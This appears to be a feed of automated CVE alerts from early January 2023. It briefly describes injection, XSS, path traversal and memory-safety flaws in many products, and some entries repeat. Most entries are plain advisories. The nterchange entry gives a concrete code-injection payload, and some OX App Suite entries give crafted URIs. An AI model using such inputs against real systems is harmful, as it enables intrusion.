🚨 CVE-2022-4583A vulnerability was found in jLEMS. It has been declared as critical. Affected by this vulnerability is the function unpackJar of the file src/main/java/org/lemsml/jlems/io/util/JUtil.java. The manipulation leads to path traversal. The attack can be launched remotely. The name of the patch is 8c224637d7d561076364a9e3c2c375daeaf463dc. It is recommended to apply a patch to fix this issue. The identifier VDB-216169 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-03 20:30:06 |
🚨 CVE-2021-32821MooTools is a collection of JavaScript utilities for JavaScript developers. All known versions include a CSS selector parser that is vulnerable to Regular Expression Denial of Service (ReDoS). An attack requires that an attacker can inject a string into a CSS selector at runtime, which is quite common with e.g. jQuery CSS selectors. No patches are available for this issue.🎖@cveNotify |
|
| 2023-01-03 20:30:02 |
🚨 CVE-2022-35845Multiple improper neutralization of special elements used in an OS Command ('OS Command Injection') vulnerabilities [CWE-78] in FortiTester 7.1.0, 7.0 all versions, 4.0.0 through 4.2.0, 2.3.0 through 3.9.1 may allow an authenticated attacker to execute arbitrary commands in the underlying shell.🎖@cveNotify |
|
| 2023-01-03 20:30:01 |
🚨 CVE-2022-41336An improper neutralization of input during web page generation vulnerability [CWE-79] in FortiPortal versions 6.0.0 through 6.0.11 and all versions of 5.3, 5.2, 5.1, 5.0 management interface may allow a remote authenticated attacker to perform a stored cross site scripting (XSS) attack via sending request with specially crafted columnindex parameter.🎖@cveNotify |
|
| 2023-01-03 20:30:00 |
🚨 CVE-2022-46175JSON5 is an extension to the popular JSON file format that aims to be easier to write and maintain by hand (e.g. for config files). The `parse` method of the JSON5 library before and including versions 1.0.1 and 2.2.1 does not restrict parsing of keys named `__proto__`, allowing specially crafted strings to pollute the prototype of the resulting object. This vulnerability pollutes the prototype of the object returned by `JSON5.parse` and not the global Object prototype, which is the commonly understood definition of Prototype Pollution. However, polluting the prototype of a single object can have significant security impact for an application if the object is later used in trusted operations. This vulnerability could allow an attacker to set arbitrary and unexpected keys on the object returned from `JSON5.parse`. The actual impact will depend on how applications utilize the returned object and how they filter unwanted keys, but could include denial of service, cross-site scripting, elevation of privilege, and in extreme cases, remote code execution. `JSON5.parse` should restrict parsing of `__proto__` keys when parsing JSON strings to objects. As a point of reference, the `JSON.parse` method included in JavaScript ignores `__proto__` keys. Simply changing `JSON5.parse` to `JSON.parse` in the examples above mitigates this vulnerability. This vulnerability is patched in json5 versions 1.0.2, 2.2.2, and later.🎖@cveNotify |
|
| 2023-01-03 18:30:08 |
🚨 CVE-2022-28389mcba_usb_start_xmit in drivers/net/can/usb/mcba_usb.c in the Linux kernel through 5.17.1 has a double free.🎖@cveNotify |
|
| 2023-01-03 18:30:07 |
🚨 CVE-2022-38766The remote keyless system on Renault ZOE 2021 vehicles sends 433.92 MHz RF signals from the same Rolling Codes set for each door-open request, which allows for a replay attack.🎖@cveNotify |
|
| 2023-01-03 18:30:06 |
🚨 CVE-2023-0039The User Post Gallery - UPG plugin for WordPress is vulnerable to authorization bypass which leads to remote command execution due to the use of a nopriv AJAX action and user supplied function calls and parameters in versions up to, and including 2.19. This makes it possible for unauthenticated attackers to call arbitrary PHP functions and perform actions like adding new files that can be webshells and updating the site's options to allow anyone to register as an administrator.🎖@cveNotify |
|
| 2023-01-03 18:30:05 |
🚨 CVE-2022-4663The Members Import plugin for WordPress is vulnerable to Self Cross-Site Scripting via the user_login parameter in an imported CSV file in versions up to, and including, 1.4.2 due to insufficient input sanitization and output escaping. This makes it possible for attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a site's administrator into uploading a CSV file with the malicious payload.🎖@cveNotify |
|
| 2023-01-03 18:30:03 |
🚨 CVE-2023-0038The "Survey Maker – Best WordPress Survey Plugin" plugin for WordPress is vulnerable to Stored Cross-Site Scripting via survey answers in versions up to, and including, 3.1.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts when submitting quizzes that will execute whenever a user accesses the submissions page.🎖@cveNotify |
|
| 2023-01-03 18:29:59 |
🚨 CVE-2022-35256The llhttp parser in the http module in Node v18.7.0 does not correctly handle header fields that are not terminated with CLRF. This may result in HTTP Request Smuggling.🎖@cveNotify |
|
| 2023-01-03 18:29:58 |
🚨 CVE-2021-3748A use-after-free vulnerability was found in the virtio-net device of QEMU. It could occur when the descriptor's address belongs to the non direct access region, due to num_buffers being set after the virtqueue elem has been unmapped. A malicious guest could use this flaw to crash QEMU, resulting in a denial of service condition, or potentially execute code on the host with the privileges of the QEMU process.🎖@cveNotify |
|
| 2023-01-03 18:29:57 |
🚨 CVE-2022-23542OpenFGA is an authorization/permission engine built for developers and inspired by Google Zanzibar. During an internal security assessment, it was discovered that OpenFGA version 0.3.0 is vulnerable to authorization bypass under certain conditions. This issue has been patched in version 0.3.1 and is backward compatible.🎖@cveNotify |
|
| 2023-01-03 18:29:56 |
🚨 CVE-2022-3491Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.0742.🎖@cveNotify |
|
| 2023-01-03 15:29:56 |
🚨 CVE-2022-4663The Members Import plugin for WordPress is vulnerable to Self Cross-Site Scripting via the user_login parameter in an imported CSV file in versions up to, and including, 1.4.2 due to insufficient input sanitization and output escaping. This makes it possible for attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a site's administrator into uploading a CSV file with the malicious payload.🎖@cveNotify |
|
| 2023-01-03 15:29:55 |
🚨 CVE-2023-0038The "Survey Maker – Best WordPress Survey Plugin" plugin for WordPress is vulnerable to Stored Cross-Site Scripting via survey answers in versions up to, and including, 3.1.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts when submitting quizzes that will execute whenever a user accesses the submissions page.🎖@cveNotify |
|
| 2023-01-03 15:29:54 |
🚨 CVE-2022-42949Silverstripe silverstripe/subsites through 2.6.0 has Insecure Permissions.🎖@cveNotify |
|
| 2023-01-03 15:29:53 |
🚨 CVE-2022-25893The package vm2 before 3.9.10 are vulnerable to Arbitrary Code Execution due to the usage of prototype lookup for the WeakMap.prototype.set method. Exploiting this vulnerability leads to access to a host object and a sandbox compromise.🎖@cveNotify |
|
| 2023-01-03 15:29:51 |
🚨 CVE-2022-25895All versions of package lite-dev-server are vulnerable to Directory Traversal due to missing input sanitization and sandboxes being employed to the req.url user input that is passed to the server code.🎖@cveNotify |
|
| 2023-01-03 15:29:50 |
🚨 CVE-2022-47635Wildix WMS 6 before 6.02.20221216, WMS 5 before 5.04.20221214, and WMS4 before 4.04.45396.23 allows Server-side request forgery (SSRF) via ZohoClient.php.🎖@cveNotify |
|
| 2023-01-03 15:29:49 |
🚨 CVE-2022-37308OX App Suite through 7.10.6 allows XSS via HTML in text/plain e-mail messages.🎖@cveNotify |
|
| 2023-01-03 15:29:48 |
🚨 CVE-2022-37309OX App Suite through 7.10.6 allows XSS via script code within a contact that has an e-mail address but lacks a name.🎖@cveNotify |
|
| 2023-01-03 15:29:46 |
🚨 CVE-2022-37310OX App Suite through 7.10.6 allows XSS via a malicious capability to the metrics or help module, as demonstrated by a /#!!&app=io.ox/files&cap= URI.🎖@cveNotify |
|
| 2023-01-03 15:29:45 |
🚨 CVE-2022-31469OX App Suite through 7.10.6 allows XSS via a deep link, as demonstrated by class="deep-link-app" for a /#!!&app=%2e./ URI.🎖@cveNotify |
|
| 2023-01-03 15:29:44 |
🚨 CVE-2022-4738A vulnerability classified as problematic has been found in SourceCodester Blood Bank Management System 1.0. Affected is an unknown function of the file index.php?page=users of the component User Registration Handler. The manipulation of the argument Name leads to cross site scripting. It is possible to launch the attack remotely. VDB-216774 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-03 15:29:43 |
🚨 CVE-2013-10007A vulnerability classified as problematic has been found in ethitter WP-Print-Friendly up to 0.5.2. This affects an unknown part of the file wp-print-friendly.php. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. Upgrading to version 0.5.3 is able to address this issue. The name of the patch is 437787292670c20b4abe20160ebbe8428187f2b4. It is recommended to upgrade the affected component. The identifier VDB-217269 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-03 14:29:47 |
🚨 CVE-2012-10003A vulnerability, which was classified as problematic, has been found in ahmyi RivetTracker. This issue affects some unknown processing. The manipulation of the argument $_SERVER['PHP_SELF'] leads to cross site scripting. The attack may be initiated remotely. The name of the patch is f053c5cc2bc44269b0496b5f275e349928a92ef9. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217271.🎖@cveNotify |
|
| 2023-01-03 14:29:46 |
🚨 CVE-2022-4871A vulnerability classified as problematic was found in ummmmm nflpick-em.com up to 2.2.x. This vulnerability affects the function _Load_Users of the file html/includes/runtime/admin/JSON/LoadUsers.php. The manipulation of the argument sort leads to sql injection. The attack can be initiated remotely. The name of the patch is dd77a35942f527ea0beef5e0ec62b92e8b93211e. It is recommended to apply a patch to fix this issue. VDB-217270 is the identifier assigned to this vulnerability. NOTE: JSON entrypoint is only accessible via an admin account🎖@cveNotify |
|
| 2023-01-03 14:29:44 |
🚨 CVE-2022-3633A vulnerability classified as problematic has been found in Linux Kernel. Affected is the function j1939_session_destroy of the file net/can/j1939/transport.c. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211932.🎖@cveNotify |
|
| 2023-01-03 14:29:43 |
🚨 CVE-2022-3629A vulnerability was found in Linux Kernel. It has been declared as problematic. This vulnerability affects the function vsock_connect of the file net/vmw_vsock/af_vsock.c. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. VDB-211930 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-03 14:29:41 |
🚨 CVE-2013-10007A vulnerability classified as problematic has been found in ethitter WP-Print-Friendly up to 0.5.2. This affects an unknown part of the file wp-print-friendly.php. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. Upgrading to version 0.5.3 is able to address this issue. The name of the patch is 437787292670c20b4abe20160ebbe8428187f2b4. It is recommended to upgrade the affected component. The identifier VDB-217269 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-03 12:29:36 |
🚨 CVE-2012-10002A vulnerability was found in ahmyi RivetTracker. It has been declared as problematic. Affected by this vulnerability is the function changeColor of the file css.php. The manipulation of the argument set_css leads to cross site scripting. The attack can be launched remotely. The name of the patch is 45a0f33876d58cb7e4a0f17da149e58fc893b858. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217267.🎖@cveNotify |
|
| 2023-01-03 12:29:35 |
🚨 CVE-2015-10012** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in sumocoders FrameworkUserBundle up to 1.3.x. It has been rated as problematic. Affected by this issue is some unknown functionality of the file Resources/views/Security/login.html.twig. The manipulation leads to information exposure through error message. Upgrading to version 1.4.0 is able to address this issue. The name of the patch is abe4993390ba9bd7821ab12678270556645f94c8. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-217268. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-01-03 07:30:01 |
🚨 CVE-2022-39039aEnrich’s a+HRD has inadequate filtering for specific URL parameter. An unauthenticated remote attacker can exploit this vulnerability to send arbitrary HTTP(s) request to launch Server-Side Request Forgery (SSRF) attack, to perform arbitrary system command or disrupt service.🎖@cveNotify |
|
| 2023-01-03 07:30:00 |
🚨 CVE-2022-39041aEnrich a+HRD has insufficient user input validation for specific API parameter. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands to access, modify and delete database.🎖@cveNotify |
|
| 2023-01-03 07:29:59 |
🚨 CVE-2022-40740Realtek GPON router has insufficient filtering for special characters. A remote attacker authenticated as an administrator can exploit this vulnerability to perform command injection attacks, to execute arbitrary system command, manipulate system or disrupt service.🎖@cveNotify |
|
| 2023-01-03 07:29:55 |
🚨 CVE-2022-41645Out-of-bounds read vulnerability in V-Server v4.0.12.0 and earlier allows a local attacker to obtain the information and/or execute arbitrary code by having a user to open a specially crafted project file.🎖@cveNotify |
|
| 2023-01-03 07:29:54 |
🚨 CVE-2022-43436The File Upload function of EasyTest has insufficient filtering for special characters and file type. A remote attacker authenticated as a general user can upload and execute arbitrary files, to manipulate system or disrupt service.🎖@cveNotify |
|
| 2023-01-03 07:29:53 |
🚨 CVE-2022-43438The Administrator function of EasyTest has an Incorrect Authorization vulnerability. A remote attacker authenticated as a general user can exploit this vulnerability to bypass the intended access restrictions, to make API functions calls, manipulate system and terminate service.🎖@cveNotify |
|
| 2023-01-03 07:29:52 |
🚨 CVE-2022-43448Out-of-bounds write vulnerability in V-SFT v6.1.7.0 and earlier and TELLUS v4.0.12.0 and earlier allows a local attacker to obtain the information and/or execute arbitrary code by having a user to open a specially crafted image file.🎖@cveNotify |
|
| 2023-01-03 07:29:49 |
🚨 CVE-2022-46304ChangingTec ServiSign component has insufficient filtering for special characters in the connection response parameter. An unauthenticated remote attacker can host a malicious website for the component user to access, which triggers command injection and allows the attacker to execute arbitrary system command to perform arbitrary system operation or disrupt service.🎖@cveNotify |
|
| 2023-01-03 07:29:48 |
🚨 CVE-2022-46305ChangingTec ServiSign component has a path traversal vulnerability. An unauthenticated LAN attacker can exploit this vulnerability to bypass authentication and access arbitrary system files.🎖@cveNotify |
|
| 2023-01-03 07:29:47 |
🚨 CVE-2022-46309Vitals ESP upload function has a path traversal vulnerability. A remote attacker with general user privilege can exploit this vulnerability to access arbitrary system files.🎖@cveNotify |
|
| 2023-01-03 07:29:46 |
🚨 CVE-2022-46360Out-of-bounds read vulnerability in V-SFT v6.1.7.0 and earlier and TELLUS v4.0.12.0 and earlier allows a local attacker to obtain the information and/or execute arbitrary code by having a user to open a specially crafted image file.🎖@cveNotify |
|
| 2023-01-03 07:29:42 |
🚨 CVE-2022-47618Merit LILIN AH55B04 & AH55B08 DVR firm has hard-coded administrator credentials. An unauthenticated remote attacker can use these credentials to log in administrator page, to manipulate system or disrupt service.🎖@cveNotify |
|
| 2023-01-03 07:29:41 |
🚨 CVE-2022-45939GNU Emacs through 28.2 allows attackers to execute commands via shell metacharacters in the name of a source-code file, because lib-src/etags.c uses the system C library function in its implementation of the ctags program. For example, a victim may use the "ctags *" command (suggested in the ctags documentation) in a situation where the current working directory has contents that depend on untrusted input.🎖@cveNotify |
|
| 2023-01-03 07:29:40 |
🚨 CVE-2022-3614In affected versions of Octopus Deploy users of certain browsers using AD to sign-in to Octopus Server were able to bypass authentication checks and be redirected to the configured redirect url without any validation.🎖@cveNotify |
|
| 2023-01-03 01:29:47 |
🚨 CVE-2022-3460In affected versions of Octopus Deploy it is possible for certain types of sensitive variables to inadvertently become unmasked when viewed in variable preview.🎖@cveNotify |
|
| 2023-01-03 01:29:43 |
🚨 CVE-2021-21200Out of bounds read in WebUI Settings in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chrome security severity: Low)🎖@cveNotify |
|
| 2023-01-03 01:29:42 |
🚨 CVE-2022-0337Inappropriate implementation in File System API in Google Chrome on Windows prior to 97.0.4692.71 allowed a remote attacker to obtain potentially sensitive information via a crafted HTML page. (Chrome security severity: High)🎖@cveNotify |
|
| 2023-01-03 01:29:41 |
🚨 CVE-2022-0801Inappropriate implementation in HTML parser in Google Chrome prior to 99.0.4844.51 allowed a remote attacker to bypass XSS preventions via a crafted HTML page. (Chrome security severity: Medium)🎖@cveNotify |
|
| 2023-01-03 01:29:37 |
🚨 CVE-2022-2743Integer overflow in Window Manager in Google Chrome on Chrome OS and Lacros prior to 104.0.5112.79 allowed a remote attacker who convinced a user to engage in specific UI interactions to perform an out of bounds memory write via crafted UI interactions. (Chrome security severity: High)🎖@cveNotify |
|
| 2023-01-03 01:29:36 |
🚨 CVE-2022-3863Use after free in Browser History in Google Chrome prior to 100.0.4896.75 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chrome security severity: High)🎖@cveNotify |
|
| 2023-01-03 01:29:35 |
🚨 CVE-2022-4025Inappropriate implementation in Paint in Google Chrome prior to 98.0.4758.80 allowed a remote attacker to leak cross-origin data outside an iframe via a crafted HTML page. (Chrome security severity: Low)🎖@cveNotify |
|
| 2023-01-03 00:29:53 |
🚨 CVE-2022-4109The Wholesale Market for WooCommerce WordPress plugin before 2.0.0 does not validate user input against path traversal attacks, allowing high privilege users such as admin to download arbitrary logs from the server even when they should not be able to (for example in multisite)🎖@cveNotify |
|
| 2023-01-03 00:29:52 |
🚨 CVE-2022-4119The Image Optimizer, Resizer and CDN WordPress plugin before 6.8.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2023-01-03 00:29:51 |
🚨 CVE-2022-4142The WordPress Filter Gallery Plugin WordPress plugin before 0.1.6 does not properly escape the filters passed in the ufg_gallery_filters ajax action before outputting them on the page, allowing a high privileged user such as an administrator to inject HTML or javascript to the plugin settings page, even when the unfiltered_html capability is disabled.🎖@cveNotify |
|
| 2023-01-03 00:29:47 |
🚨 CVE-2022-4200The Login with Cognito WordPress plugin through 1.4.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2023-01-03 00:29:46 |
🚨 CVE-2022-4237The Welcart e-Commerce WordPress plugin before 2.8.6 does not validate user input before using it in file_exist() functions via various AJAX actions available to any authenticated users, which could allow users with a role as low as subscriber to perform PHAR deserialisation when they can upload a file and a suitable gadget chain is present on the blog🎖@cveNotify |
|
| 2023-01-03 00:29:45 |
🚨 CVE-2022-4256The All-in-One Addons for Elementor WordPress plugin before 2.4.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2023-01-03 00:29:42 |
🚨 CVE-2022-4260The WP-Ban WordPress plugin before 1.69.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2023-01-03 00:29:41 |
🚨 CVE-2022-4298The Wholesale Market WordPress plugin before 2.2.1 does not have authorisation check, as well as does not validate user input used to generate system path, allowing unauthenticated attackers to download arbitrary file from the server.🎖@cveNotify |
|
| 2023-01-03 00:29:40 |
🚨 CVE-2022-4324The Custom Field Template WordPress plugin before 2.5.8 unserialises the content of an imported file, which could lead to PHP object injections issues when a high privilege user import (intentionally or not) a malicious Customizer Styling file and a suitable gadget chain is present on the blog.🎖@cveNotify |
|
| 2023-01-03 00:29:37 |
🚨 CVE-2022-4329The Product list Widget for Woocommerce WordPress plugin through 1.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against both unauthenticated and authenticated users (such as high privilege one like admin).🎖@cveNotify |
|
| 2023-01-03 00:29:36 |
🚨 CVE-2022-4351The Qe SEO Handyman WordPress plugin through 1.0 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin🎖@cveNotify |
|
| 2023-01-03 00:29:35 |
🚨 CVE-2022-4355The LetsRecover WordPress plugin through 1.1.0 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin🎖@cveNotify |
|
| 2023-01-02 22:29:37 |
🚨 CVE-2014-125036A vulnerability, which was classified as problematic, has been found in drybjed ansible-ntp. Affected by this issue is some unknown functionality of the file meta/main.yml. The manipulation leads to insufficient control of network message volume. The attack can only be done within the local network. The name of the patch is ed4ca2cf012677973c220cdba36b5c60bfa0260b. It is recommended to apply a patch to fix this issue. VDB-217190 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-02 22:29:36 |
🚨 CVE-2022-22728A flaw in Apache libapreq2 versions 2.16 and earlier could cause a buffer overflow while processing multipart form uploads. A remote attacker could send a request causing a process crash which could lead to a denial of service attack.🎖@cveNotify |
|
| 2023-01-02 20:29:37 |
🚨 CVE-2014-125037A vulnerability, which was classified as critical, was found in License to Kill. This affects an unknown part of the file models/injury.rb. The manipulation of the argument name leads to sql injection. The name of the patch is cd11cf174f361c98e9b1b4c281aa7b77f46b5078. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217191.🎖@cveNotify |
|
| 2023-01-02 20:29:36 |
🚨 CVE-2022-41912The crewjam/saml go library prior to version 0.4.9 is vulnerable to an authentication bypass when processing SAML responses containing multiple Assertion elements. This issue has been corrected in version 0.4.9. There are no workarounds other than upgrading to a fixed version.🎖@cveNotify |
|
| 2023-01-02 20:29:35 |
🚨 CVE-2021-35576Vulnerability in the Oracle Database Enterprise Edition Unified Audit component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1 and 19c. Easily exploitable vulnerability allows high privileged attacker having Local Logon privilege with network access via Oracle Net to compromise Oracle Database Enterprise Edition Unified Audit. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Database Enterprise Edition Unified Audit accessible data. CVSS 3.1 Base Score 2.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2023-01-02 18:29:42 |
🚨 CVE-2015-10009A vulnerability was found in nterchange up to 4.1.0. It has been rated as critical. This issue affects the function getContent of the file app/controllers/code_caller_controller.php. The manipulation of the argument q with the input %5C%27%29;phpinfo%28%29;/* leads to code injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.1 is able to address this issue. The name of the patch is fba7d89176fba8fe289edd58835fe45080797d99. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217187.🎖@cveNotify |
|
| 2023-01-02 18:29:41 |
🚨 CVE-2022-48197** UNSUPPORTED WHEN ASSIGNED ** Reflected cross-site scripting (XSS) exists in the TreeView of YUI2 through 2800: up.php sam.php renderhidden.php removechildren.php removeall.php readd.php overflow.php newnode2.php newnode.php. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-01-02 18:29:40 |
🚨 CVE-2023-22451Kiwi TCMS is an open source test management system. In version 11.6 and prior, when users register new accounts and/or change passwords, there is no validation in place which would prevent them from picking an easy to guess password. This issue is resolved by providing defaults for the `AUTH_PASSWORD_VALIDATORS` configuration setting. As of version 11.7, the password can’t be too similar to other personal information, must contain at least 10 characters, can’t be a commonly used password, and can’t be entirely numeric. As a workaround, an administrator may reset all passwords in Kiwi TCMS if they think a weak password may have been chosen.🎖@cveNotify |
|
| 2023-01-02 13:29:37 |
🚨 CVE-2014-125034A vulnerability has been found in stiiv contact_app and classified as problematic. Affected by this vulnerability is the function render of the file libs/View.php. The manipulation of the argument var leads to cross site scripting. The attack can be launched remotely. The name of the patch is 67bec33f559da9d41a1b45eb9e992bd8683a7f8c. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217183.🎖@cveNotify |
|
| 2023-01-02 13:29:36 |
🚨 CVE-2015-10008** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in 82Flex WEIPDCRM. It has been classified as critical. This affects an unknown part. The manipulation leads to sql injection. It is possible to initiate the attack remotely. The name of the patch is 43bad79392332fa39e31b95268e76fbda9fec3a4. It is recommended to apply a patch to fix this issue. The identifier VDB-217185 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-01-02 13:29:35 |
🚨 CVE-2019-25093A vulnerability, which was classified as problematic, was found in dragonexpert Recent Threads on Index. Affected is the function recentthread_list_threads of the file inc/plugins/recentthreads/hooks.php of the component Setting Handler. The manipulation of the argument recentthread_forumskip leads to cross site scripting. It is possible to launch the attack remotely. The name of the patch is 051465d807a8fcc6a8b0f4bcbb19299672399f48. It is recommended to apply a patch to fix this issue. VDB-217182 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-02 12:30:04 |
🚨 CVE-2023-22551The FTP (aka "Implementation of a simple FTP client and server") project through 96c1a35 allows remote attackers to cause a denial of service (memory consumption) by engaging in client activity, such as establishing and then terminating a connection. This occurs because malloc is used but free is not.🎖@cveNotify |
|
| 2023-01-02 12:30:03 |
🚨 CVE-2010-10002** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as problematic has been found in SimpleSAMLphp simplesamlphp-module-openid. Affected is an unknown function of the file templates/consumer.php of the component OpenID Handler. The manipulation of the argument AuthState leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 1.0 is able to address this issue. The name of the patch is d652d41ccaf8c45d5707e741c0c5d82a2365a9a3. It is recommended to upgrade the affected component. VDB-217170 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-01-02 12:30:02 |
🚨 CVE-2013-10006A vulnerability classified as problematic was found in Ziftr primecoin up to 0.8.4rc1. Affected by this vulnerability is the function HTTPAuthorized of the file src/bitcoinrpc.cpp. The manipulation of the argument strUserPass/strRPCUserColonPass leads to observable timing discrepancy. Upgrading to version 0.8.4rc2 is able to address this issue. The name of the patch is cdb3441b5cd2c1bae49fae671dc4a496f7c96322. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217171.🎖@cveNotify |
|
| 2023-01-02 12:30:00 |
🚨 CVE-2015-10006A vulnerability, which was classified as problematic, has been found in admont28 Ingnovarq. Affected by this issue is some unknown functionality of the file app/controller/insertarSliderAjax.php. The manipulation of the argument imagetitle leads to cross site scripting. The attack may be launched remotely. The name of the patch is 9d18a39944d79dfedacd754a742df38f99d3c0e2. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217172.🎖@cveNotify |
|
| 2023-01-02 12:29:59 |
🚨 CVE-2023-0029A vulnerability was found in Multilaser RE708 RE1200R4GC-2T2R-V3_v3411b_MUL029B. It has been rated as problematic. This issue affects some unknown processing of the component Telnet Service. The manipulation leads to denial of service. The attack may be initiated remotely. The identifier VDB-217169 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-02 12:29:58 |
🚨 CVE-2014-125030A vulnerability, which was classified as critical, has been found in taoeffect Empress. Affected by this issue is some unknown functionality. The manipulation leads to use of hard-coded password. The name of the patch is 557e177d8a309d6f0f26de46efb38d43e000852d. It is recommended to apply a patch to fix this issue. VDB-217154 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-02 12:29:57 |
🚨 CVE-2018-25062A vulnerability classified as problematic has been found in flar2 ElementalX up to 6.x. Affected is the function xfrm_dump_policy_done of the file net/xfrm/xfrm_user.c of the component ipsec. The manipulation leads to denial of service. Upgrading to version 7.00 is able to address this issue. The name of the patch is 1df72c9f0f61304437f4f1037df03b5fb36d5a79. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-217152.🎖@cveNotify |
|
| 2023-01-02 12:29:55 |
🚨 CVE-2018-25063A vulnerability classified as problematic was found in Zenoss Dashboard up to 1.3.4. Affected by this vulnerability is an unknown functionality of the file ZenPacks/zenoss/Dashboard/browser/resources/js/defaultportlets.js. The manipulation of the argument HTMLString leads to cross site scripting. The attack can be launched remotely. Upgrading to version 1.3.5 is able to address this issue. The name of the patch is f462285a0a2d7e1a9255b0820240b94a43b00a44. It is recommended to upgrade the affected component. The identifier VDB-217153 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-02 12:29:54 |
🚨 CVE-2022-34322Multiple XSS issues were discovered in Sage Enterprise Intelligence 2021 R1.1 that allow an attacker to execute JavaScript code in the context of users' browsers. The attacker needs to be authenticated to reach the vulnerable features. An issue is present in the Notify Users About Modification menu and the Notifications feature. A user can send malicious notifications and execute JavaScript code in the browser of every user who has enabled notifications. This is a stored XSS, and can lead to privilege escalation in the context of the application. (Another issue is present in the Favorites tab. The name of a favorite or a folder of favorites is interpreted as HTML, and can thus embed JavaScript code, which is executed when displayed. This is a self-XSS.)🎖@cveNotify |
|
| 2023-01-02 12:29:53 |
🚨 CVE-2022-34323Multiple XSS issues were discovered in Sage XRT Business Exchange 12.4.302 that allow an attacker to execute JavaScript code in the context of other users' browsers. The attacker needs to be authenticated to reach the vulnerable features. An issue is present in the Filters and Display model features (OnlineBanking > Web Monitoring > Settings > Filters / Display models). The name of a filter or a display model is interpreted as HTML and can thus embed JavaScript code, which is executed when displayed. This is a stored XSS. Another issue is present in the Notification feature (OnlineBanking > Configuration > Notifications and alerts > Alerts *). The name of an alert is interpreted as HTML, and can thus embed JavaScript code, which is executed when displayed. This is a stored XSS. (Also, an issue is present in the File download feature, accessible via /OnlineBanking/cgi/isapi.dll/DOWNLOADFRS. When requesting to show the list of downloadable files, the contents of three form fields are embedded in the JavaScript code without prior sanitization. This is essentially a self-XSS.)🎖@cveNotify |
|
| 2023-01-02 12:29:52 |
🚨 CVE-2022-34324Multiple SQL injections in Sage XRT Business Exchange 12.4.302 allow an authenticated attacker to inject malicious data in SQL queries: Add Currencies, Payment Order, and Transfer History.🎖@cveNotify |
|
| 2023-01-02 12:29:51 |
🚨 CVE-2022-37785An issue was discovered in WeCube Platform 3.2.2. Cleartext passwords are displayed in the configuration for terminal plugins.🎖@cveNotify |
|
| 2023-01-02 12:29:50 |
🚨 CVE-2022-37786An issue was discovered in WeCube Platform 3.2.2. There are multiple CSV injection issues: the [Home / Admin / Resources] page, the [Home / Admin / System Params] page, and the [Home / Design / Basekey Configuration] page.🎖@cveNotify |
|
| 2023-01-02 12:29:49 |
🚨 CVE-2022-37787An issue was discovered in WeCube platform 3.2.2. A DOM XSS vulnerability has been found on the plugin database execution page.🎖@cveNotify |
|
